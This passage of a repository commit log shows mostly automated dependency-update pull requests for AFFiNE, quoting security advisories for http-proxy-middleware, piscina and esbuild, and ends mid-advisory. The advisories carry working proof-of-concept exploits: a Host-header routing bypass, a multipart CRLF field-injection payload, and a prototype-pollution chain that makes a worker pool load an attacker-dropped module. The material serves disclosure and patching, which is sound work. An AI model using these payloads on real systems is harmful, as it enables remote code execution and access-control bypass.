assert.equal(baseline.body, 'DEFAULT'); console.log(`STEP baseline-route body=${baseline.body}`); const crafted = await request('/api', CRAFTED_HOST); assert.equal(crafted.statusCode, 200); assert.equal(crafted.body, 'SECRET'); assert.notEqual(CRAFTED_HOST, ROUTER_KEY.split('/')[0]); console.log(`STEP crafted-route body=${crafted.body}`); console.log('RESULT reproduced host_header_injection router substring match bypass'); } finally { await Promise.allSettled([close(proxyServer), close(defaultBackend), close(secretBackend)]); } ``` This PoC starts: - one default backend returning `DEFAULT` - one alternate backend returning `SECRET` - one proxy using: ```js createProxyMiddleware({ target: 'http://127.0.0.1:3101', router: { [ROUTER_KEY]: 'http://127.0.0.1:3102', }, }); ``` It then sends: 1. a baseline request to `/api` with `Host: safe.example:3000` 2. a crafted request to `/api` with `Host: evillocalhost:3000` Observed result from the validated PoC: - baseline request: `STEP baseline-route body=DEFAULT` - crafted request: `STEP crafted-route body=SECRET` - success marker: `RESULT reproduced host_header_injection router substring match bypass` The PoC is considered successful only if: 1. the baseline request stays on the default backend 2. the crafted request reaches the alternate backend 3. the crafted host is not equal to the configured router host ##### Impact This is a backend-selection integrity issue in a documented library feature. Applications that use host+path router-table rules for backend segmentation, tenant routing, or separation of public and more sensitive upstreams can have that routing boundary bypassed by an unauthenticated external client using an ordinary crafted `Host` header. #### Severity - CVSS Score: 6.9 / 10 (Medium) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N` #### References - [https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj](https://redirect.github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj) - [https://github.com/advisories/GHSA-64mm-vxmg-q3vj](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### http-proxy-middleware: multipart/form-data field injection via unescaped CRLF in `fixRequestBody` [CVE-2026-55603](https://nvd.nist.gov/vuln/detail/CVE-2026-55603) / [GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm) <details> <summary>More information</summary> #### Details ##### Summary `fixRequestBody()` is the library's documented helper for re-emitting a request body that was already consumed by a body parser. When the **outgoing** `Content-Type` is `multipart/form-data`, it rebuilds the body with `handlerFormDataBodyData()`, which interpolates each `req.body` key and value directly into the multipart wire format **without neutralizing CR/LF**: ```js // dist/handlers/fix-request-body.js function handlerFormDataBodyData(contentType, data) { const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1'); let str = ''; for (const [key, value] of Object.entries(data)) { str += `--${boundary}\r\nContent-Disposition: form-data; name="${key}"\r\n\r\n${value}\r\n`; } } ``` A `\r\n` inside a value (or key) lets an attacker close the current part and inject an **entirely new form part**. Because the proxy's own body parser saw a single opaque value, any gateway-side policy or validation performed on `req.body` is evaluated against a different set of fields than the upstream backend ultimately parses a request/parameter desynchronization across the trust boundary. By contrast, the sibling output branches are safe: `application/json` uses `JSON.stringify` (escapes control chars) and `application/x-www-form-urlencoded` uses `querystring.stringify` (percent-encodes). Only the multipart branch lacks escaping. ##### Preconditions All three must hold; this narrows real-world exposure and is the basis for `AC:H`: 1. The proxy app populates `req.body` with a **non-multipart** parser (`express.urlencoded`, `express.json`, or text) so an injected boundary in a value is **not** split on input. 2. The proxied (outgoing) request is sent as **`multipart/form-data`** (e.g. an adaptation layer, or any flow that sets the upstream content-type to multipart), so the vulnerable branch runs. 3. The app calls `fixRequestBody` (the documented pattern for "I body-parsed, now re-stream"), and an attacker controls at least one body field value or key. > Note: a pure multipart-in → multipart-out flow (e.g. `multer`) is generally **not** exploitable for a *new-field* injection, because the proxy's multipart parser already splits the injected boundary, so `req.body` and the backend agree. The desync specifically requires a non-multipart input parser. ##### Impact When the preconditions hold, an attacker injects/overrides multipart fields seen only by the backend: - **Validation / access-control bypass** bypass gateway-side field checks (demonstrated below: a gateway that forbids `role=admin` is bypassed; backend grants admin). - **Parameter tampering** add or overwrite fields the backend trusts (IDs, flags, prices). - **File-part injection** inject a `filename="..."` part into the upstream multipart stream. ##### Proof of Concept ```js // npm i http-proxy-middleware@4.0.0 (Node ESM: save as minimal.mjs) import { fixRequestBody } from 'http-proxy-middleware'; // `req.body` as a NON-multipart parser (express.urlencoded / express.json) yields it. // The attacker sent user=alice%0D%0A--BB%0D%0A... so this ONE field's value holds CRLF: const req = { readableLength: 0, body: { user: 'alice\r\n--BB\r\nContent-Disposition: form-data; name="role"\r\n\r\nadmin\r\n--BB--' }}; // Minimal stand-in for the outgoing proxy request; capture what gets written. const out = []; const proxyReq = { h: { 'content-type': 'multipart/form-data; boundary=BB' }, getHeader(n){ return this.h[n.toLowerCase()]; }, setHeader(n,v){ this.h[n.toLowerCase()] = v; }, write(d){ out.push(Buffer.from(d)); }, }; fixRequestBody(proxyReq, req); // library rebuilds the multipart body console.log(Buffer.concat(out).toString()); ``` Output: one input field becomes **two** parts; `role=admin` was injected via the unescaped CRLF: ``` --BB Content-Disposition: form-data; name="user" alice --BB Content-Disposition: form-data; name="role" <-- injected part; never present in req.body's keys admin --BB-- ``` `req.body` had a single key (`user`), so any gateway policy checking `req.body.role` passes, yet the backend's multipart parser receives `role=admin`. On the wire the attacker simply sends, as `application/x-www-form-urlencoded`: `user=alice%0D%0A--BB%0D%0AContent-Disposition:%20form-data;%20name="role"%0D%0A%0D%0Aadmin%0D%0A--BB--` ##### Remediation Neutralize CR/LF (and `"`) in keys/values before interpolation, or build the body with a real multipart encoder (e.g. `FormData` / `form-data`) instead of string concatenation. Minimal fix: ```js function handlerFormDataBodyData(contentType, data) { const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1'); const bad = /[\r\n]/; let str = ''; for (const [key, value] of Object.entries(data)) { const v = String(value); if (bad.test(key) || bad.test(v)) { throw new Error('fixRequestBody: CR/LF not allowed in multipart field name/value'); } str += `--${boundary}\r\nContent-Disposition: form-data; name="${key.replace(/"/g, '%22')}"\r\n\r\n${v}\r\n`; } } ``` (Reject is preferable to silent stripping, to avoid masking malicious input.) #### Severity - CVSS Score: 7.5 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N` #### References - [https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm) - [https://github.com/advisories/GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>chimurai/http-proxy-middleware (http-proxy-middleware)</summary> ### [`v3.0.7`](https://redirect.github.com/chimurai/http-proxy-middleware/releases/tag/v3.0.7) [Compare Source](https://redirect.github.com/chimurai/http-proxy-middleware/compare/v3.0.6...v3.0.7) #### What's Changed - fix(fixRequestBody): harden form-data stringification by [@​chimurai](https://redirect.github.com/chimurai) in [#​1259](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1259) - chore(package.json): v3.0.7 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1261](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1261) **Full Changelog**: <https://github.com/chimurai/http-proxy-middleware/compare/v3.0.6...v3.0.7> ### [`v3.0.6`](https://redirect.github.com/chimurai/http-proxy-middleware/releases/tag/v3.0.6) [Compare Source](https://redirect.github.com/chimurai/http-proxy-middleware/compare/v3.0.5...v3.0.6) #### What's Changed - fix(types): fix Logger type by [@​chimurai](https://redirect.github.com/chimurai) in [#​1104](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1104) - fix(fixRequestBody): support text/plain by [@​knudtty](https://redirect.github.com/knudtty) in [#​1103](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1103) - chore(examples): bump deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1105](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1105) - build(prettier): improve prettier setup by [@​chimurai](https://redirect.github.com/chimurai) in [#​1108](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1108) - chore(deps): fix punycode node deprecation warning by [@​chimurai](https://redirect.github.com/chimurai) in [#​1109](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1109) - chore(examples): bump deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1110](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1110) - build(codespaces): add devcontainer.json by [@​chimurai](https://redirect.github.com/chimurai) in [#​1112](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1112) - chore(package): bump dev dependencies by [@​chimurai](https://redirect.github.com/chimurai) in [#​1116](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1116) - ci(github-action): ci.yml add node v24 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1117](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1117) - chore(package): bump dev dependencies by [@​chimurai](https://redirect.github.com/chimurai) in [#​1118](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1118) - chore(package): upgrade to jest v30 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1122](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1122) - chore(examples): upgrade deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1124](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1124) - chore(package): update dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1125](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1125) - test(websocket): fix ws import by [@​chimurai](https://redirect.github.com/chimurai) in [#​1126](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1126) - chore(refactor): use `node:` protocol imports by [@​chimurai](https://redirect.github.com/chimurai) in [#​1127](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1127) - ci(node24): pin node24 due to TLS issue with mockttp by [@​chimurai](https://redirect.github.com/chimurai) in [#​1137](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1137) - docs(recipes/pathRewrite.md): fix comment by [@​DEBargha2004](https://redirect.github.com/DEBargha2004) in [#​1135](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1135) - chore(package): bump dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1138](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1138) - chore(deps): update actions/checkout action to v5 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1140](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1140) - fix(error-response-plugin): sanitize input by [@​chimurai](https://redirect.github.com/chimurai) in [#​1141](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1141) - chore(package.json): update dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1143](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1143) - chore: add context7.json by [@​chimurai](https://redirect.github.com/chimurai) in [#​1144](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1144) - build(eslint): update eslint.config.mjs by [@​chimurai](https://redirect.github.com/chimurai) in [#​1145](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1145) - ci(github workflow): harden github workflows by [@​chimurai](https://redirect.github.com/chimurai) in [#​1146](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1146) - chore(package): bump dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1147](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1147) - ci(ci.yml): unpin node 24 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1148](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1148) - docs(recipes): fix servers.md http.createServer example by [@​hacklschorsch](https://redirect.github.com/hacklschorsch) in [#​1150](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1150) - ci: publish with oidc by [@​chimurai](https://redirect.github.com/chimurai) in [#​1152](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1152) - chore(package.json): bump dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1153](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1153) - chore(package.json): bump dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1155](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1155) - chore(package.json): bump dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1158](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1158) - test(types.spec.ts): add type check when req or res are 'any' by [@​chimurai](https://redirect.github.com/chimurai) in [#​1161](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1161) - chore(package.json): bump deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1164](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1164) - chore(package.json): eslint v10 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1165](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1165) - chore(package.json): bump dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1166](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1166) - chore(package.json): bump dev-deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1171](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1171) - docs(examples): fix websocket example by [@​chimurai](https://redirect.github.com/chimurai) in [#​1170](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1170) - build(vscode): use workspace version of TypeScript by [@​chimurai](https://redirect.github.com/chimurai) in [#​1173](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1173) - fix(router): harden proxy-table matching by [@​chimurai](https://redirect.github.com/chimurai) in [#​1254](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1254) - chore(package.json): v3.0.6 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1256](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1256) #### New Contributors - [@​knudtty](https://redirect.github.com/knudtty) made their first contribution in [#​1103](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1103) - [@​DEBargha2004](https://redirect.github.com/DEBargha2004) made their first contribution in [#​1135](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1135) - [@​hacklschorsch](https://redirect.github.com/hacklschorsch) made their first contribution in [#​1150](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1150) **Full Changelog**: <https://github.com/chimurai/http-proxy-middleware/compare/v3.0.5...v3.0.6> </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>v2026.6.19-canary.1031 |
||
|
|
9a9f243966 |
chore: bump up piscina version to v5.2.0 [SECURITY] (#15132)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [piscina](https://redirect.github.com/piscinajs/piscina) | [`5.1.4` → `5.2.0`](https://renovatebot.com/diffs/npm/piscina/5.1.4/5.2.0) |  |  | --- ### piscina: Prototype Pollution Gadget → RCE via inherited options.filename [CVE-2026-55388](https://nvd.nist.gov/vuln/detail/CVE-2026-55388) / [GHSA-x9g3-xrwr-cwfg](https://redirect.github.com/advisories/GHSA-x9g3-xrwr-cwfg) <details> <summary>More information</summary> #### Details ##### Summary `piscina`'s constructor and `run()` paths read the `filename` option via plain member access: ```js // dist/index.js line 92 (constructor) const filename = options.filename ? (0, common_1.maybeFileURLToPath)(options.filename) : null; this.options = { ...kDefaultOptions, ...options, filename, maxQueue: 0 }; // dist/index.js line 616 (run()) run(task, options = kDefaultRunOptions) { if (options === null || typeof options !== 'object') { return Promise.reject(new TypeError('options must be an object')); } const { transferList, filename, name, signal } = options; ``` Both reads fall through the prototype chain when the caller's options object doesn't have `filename` as an own property. When `Object.prototype.filename` is polluted upstream — by any of the well-documented PP-source CVEs (lodash<4.17.13, qs<6.10.3, set-value<4.1.0, minimist<1.2.6, deepmerge<4.2.2, and others) — the inherited value flows to `worker_threads.Worker` import and the attacker's `.mjs` runs in the worker. **Subtlety**: calling `pool.run(task)` with no second arg uses `kDefaultRunOptions` which has `filename: null` as an OWN property — that path DOES NOT fire. The vulnerable shape is when the caller passes their own options object (commonly `{signal: ac.signal}` for abort support, `{name: ...}` for task labelling, etc.). These caller-built options objects inherit from `Object.prototype` unless the caller explicitly uses `Object.create(null)`. ##### Impact Two preconditions: 1. **Upstream PP-source** somewhere in the process — common in transitive deps 2. **Attacker-controllable `.mjs`** at a known filesystem path — realistic via upload endpoints, /tmp races, predictable node_modules paths, or supply-chain Once both fire: - Every `pool.run(task, opts)` call across the entire process is hijacked - Attacker's exported function is called with the legitimate caller's task data — **attacker reads per-request app data** - Attacker controls the return value — caller receives `worker_response.by = "ATTACKER-WORKER"` and any other attacker-supplied response fields — **attacker can poison return values to legitimate clients** - Hijack persists until process restart Strictly worse than the analogous pino chain because piscina actually *invokes* the attacker function with caller data on every dispatch (pino imports the attacker module once and errors out). ##### Affected versions Empirically verified vulnerable on `piscina@5.1.4` (latest stable at time of disclosure). The bug shape is in the constructor's `options.filename` read at line 92 of `dist/index.js`, present since the worker-pool API stabilized — likely all 3.x / 4.x / 5.x affected. ##### Proof of concept ##### A) Minimal in-process PoC ```js import fs from 'fs'; // 1) Drop the attacker module (any path the victim process can read) fs.writeFileSync('/tmp/atk.mjs', ` import fs from 'fs'; fs.writeFileSync('/tmp/PISCINA_RCE_SENTINEL', JSON.stringify({ rce: 'CONFIRMED', pid: process.pid, argv1: process.argv[1], })); export default function(arg) { return 'attacker-return-' + JSON.stringify(arg); } `); // 2) Upstream PP-source — pollute Object.prototype.filename // (representative of CVE-2019-10744 lodash<4.17.13, CVE-2022-24999 qs<6.10.3, // and ~30 historical PP-source CVEs) const payload = JSON.parse('{"__proto__":{"filename":"/tmp/atk.mjs"}}'); function vulnMerge(t, s) { for (const k of Object.keys(s)) { if (s[k] !== null && typeof s[k] === 'object') { if (!t[k]) t[k] = {}; vulnMerge(t[k], s[k]); } else t[k] = s[k]; } } vulnMerge({}, payload); // 3) Piscina with empty options inherits the polluted filename const { Piscina } = await import('piscina'); const p = new Piscina({}); // inherits filename const result = await p.run({}); // worker imports /tmp/atk.mjs await p.destroy(); // 4) sentinel exists; attacker fn was called with task data console.log(fs.readFileSync('/tmp/PISCINA_RCE_SENTINEL', 'utf8')); console.log('attacker fn returned:', result); // → "attacker-return-{}" ``` ##### B) Full-stack HTTP chain (this is the realistic shape) A correctly-initialized pool gets hijacked by attacker activity. Pool is created at server boot with a legitimate worker, then per-request handlers call `pool.run(req.body, {signal: ac.signal})` — the standard abort-aware shape. ```js // === server.mjs === import express from 'express'; import { Piscina } from 'piscina'; // Vulnerable PP-source middleware (lodash<4.17.13 equivalent) function vulnMerge(t, s) { for (const k of Object.keys(s)) { if (s[k] !== null && typeof s[k] === 'object') { if (!t[k]) t[k] = {}; vulnMerge(t[k], s[k]); } else t[k] = s[k]; } } // CORRECT pool init at boot const pool = new Piscina({ filename: './valid-worker.mjs', minThreads: 1, maxThreads: 2, }); const config = {}; const app = express(); app.post('/api/settings', express.json(), (req, res) => { vulnMerge(config, req.body); // PP source res.json({ ok: true }); }); app.post('/api/process', express.json(), async (req, res) => { const ac = new AbortController(); const result = await pool.run(req.body, { signal: ac.signal }); // <-- hijacked res.json({ ok: true, worker_response: result }); }); app.listen(7755); // === Attacker, 3 HTTP requests === // POST /upload → drops /tmp/atk.mjs // POST /api/settings with body: {"__proto__":{"filename":"/tmp/atk.mjs"}} // POST /api/process → pool.run() destructures filename via prototype // → worker imports /tmp/atk.mjs // → attacker fn called with req.body of THIS request // → caller receives attacker-shaped response ``` Empirical observation on `piscina@5.1.4` + Node 23.11.0: - Pre-attack `/api/process` returns `{by: 'valid-worker'}` - Cold-path `/probe` after PP source confirms `({}).filename` is polluted process-wide - Post-attack `/api/process` returns `{by: 'ATTACKER-WORKER', processed: <caller's exfil data>}` - Sentinel file written from inside `piscina/dist/worker.js` with the worker process's uid + env access ##### Recommended fix Minimal — own-property guard at both option-read sites: ```js // constructor (line 92) const userFilename = Object.prototype.hasOwnProperty.call(options, 'filename') ? options.filename : null; const filename = userFilename ? (0, common_1.maybeFileURLToPath)(userFilename) : null; // run() (line 616) const safeOpts = Object.create(null); Object.assign(safeOpts, options); // copies own props only? — keeps shape const { transferList, filename, name, signal } = safeOpts; ``` More idiomatic — use a null-prototype working object throughout `this.options`: ```js const safeOpts = Object.create(null); Object.assign(safeOpts, kDefaultOptions, options); this.options = safeOpts; this.options.filename = safeOpts.filename ? (0, common_1.maybeFileURLToPath)(safeOpts.filename) : null; this.options.maxQueue = 0; ``` Either approach closes the gadget without breaking any legitimate caller pattern. The pattern is the same as recommended for axios CVE-2026-44494 and the pino PSA filed earlier today. Cross-fix consideration: any other library you maintain that uses similar `options.X` member-access for worker / child-process / module-load operations is worth a quick audit. ##### Coordination - Same maintainer as pino — you're already in security-triage mode for that PSA. Happy to coordinate timing / disclosure dates across both. - Will not share publicly until GHSA published or 90 days. - Please credit `ridingsa` if you choose to credit a reporter. ##### How this was discovered Generalized the pino disclosure's mechanism — any library that reads a string option via plain member access and dynamic-loads it (via `import()` / `require()` / `new Worker()`) is a candidate. Ran a sweep across 10 candidate libraries; piscina + fastify (via pino propagation) fired. Piscina is independently vulnerable through its own option-read sites, hence this separate disclosure. #### Severity - CVSS Score: 8.1 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H` #### References - [https://github.com/piscinajs/piscina/security/advisories/GHSA-x9g3-xrwr-cwfg](https://redirect.github.com/piscinajs/piscina/security/advisories/GHSA-x9g3-xrwr-cwfg) - [https://github.com/advisories/GHSA-x9g3-xrwr-cwfg](https://redirect.github.com/advisories/GHSA-x9g3-xrwr-cwfg) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-x9g3-xrwr-cwfg) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>piscinajs/piscina (piscina)</summary> ### [`v5.2.0`](https://redirect.github.com/piscinajs/piscina/compare/v5.1.4...v5.2.0) [Compare Source](https://redirect.github.com/piscinajs/piscina/compare/v5.1.4...v5.2.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
e2624d93c7 |
fix(core): filters emojipicker on label in addition to tags (#15129)
Fixes #15116 # Issue Emojipicker keyword filtering only filtered on `tags`, and not `label`. So searching for an emoji's name would not result in said emoji ending up in the result. E.G. searching "sunflower" does not make 🌻 appear # Solution Adding an extra condition to the filter function to check if the keyword is a substring of an emoji's label # Result Search results now include emojis with that `label` <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Improved emoji picker search to include matches on both emoji labels and tags (case-insensitive), enabling broader search results for better discoverability. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
766219d4e1 |
chore: bump up nestjs to v11.1.27 (#15130)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@nestjs/common](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common)) | [`11.1.24` → `11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.24/11.1.27) |  |  | | [@nestjs/core](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core)) | [`11.1.24` → `11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.24/11.1.27) |  |  | | [@nestjs/platform-express](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express)) | [`11.1.24` → `11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.24/11.1.27) |  |  | | [@nestjs/platform-socket.io](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io)) | [`11.1.24` → `11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.24/11.1.27) |  |  | | [@nestjs/websockets](https://redirect.github.com/nestjs/nest) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets)) | [`11.1.24` → `11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.24/11.1.27) |  |  | --- > [!WARNING] > Some dependencies could not be looked up. Check the [Dependency Dashboard](../issues/5188) for more information. --- ### Release Notes <details> <summary>nestjs/nest (@​nestjs/common)</summary> ### [`v11.1.27`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.27) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.26...v11.1.27) #### What's Changed - fix(core): sse async handlers teardown issue by [@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec) in [#​17131](https://redirect.github.com/nestjs/nest/pull/17131) - fix(platform-fastify): forRoutes middleware ending slash by [@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec) in [#​17138](https://redirect.github.com/nestjs/nest/pull/17138) **Full Changelog**: <https://github.com/nestjs/nest/compare/v11.1.26...v11.1.27> ### [`v11.1.26`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.26) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.25...v11.1.26) #### What's Changed - fix(core): post sse endpoint empty response [#​17098](https://redirect.github.com/nestjs/nest/issues/17098) by [@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec) in [#​17099](https://redirect.github.com/nestjs/nest/pull/17099) **Full Changelog**: <https://github.com/nestjs/nest/compare/v11.1.25...v11.1.26> ### [`v11.1.25`](https://redirect.github.com/nestjs/nest/compare/v11.1.24...02f804159841a2771755c382832a7938b904c420) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.24...v11.1.25) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about these updates again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMTkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIxOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
01d7ef88e3 |
chore: bump up esbuild version to ^0.28.0 [SECURITY] (#15128)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [esbuild](https://redirect.github.com/evanw/esbuild) | [`^0.25.12` → `^0.28.0`](https://renovatebot.com/diffs/npm/esbuild/0.25.12/0.28.1) |  |  | --- > [!WARNING] > Some dependencies could not be looked up. Check the [Dependency Dashboard](../issues/5188) for more information. --- ### esbuild enables any website to send any requests to the development server and read the response [GHSA-67mh-4wv8-2f99](https://redirect.github.com/advisories/GHSA-67mh-4wv8-2f99) <details> <summary>More information</summary> #### Details ##### Summary esbuild allows any websites to send any request to the development server and read the response due to default CORS settings. ##### Details esbuild sets `Access-Control-Allow-Origin: *` header to all requests, including the SSE connection, which allows any websites to send any request to the development server and read the response. https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L121 https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L363 **Attack scenario**: 1. The attacker serves a malicious web page (`http://malicious.example.com`). 1. The user accesses the 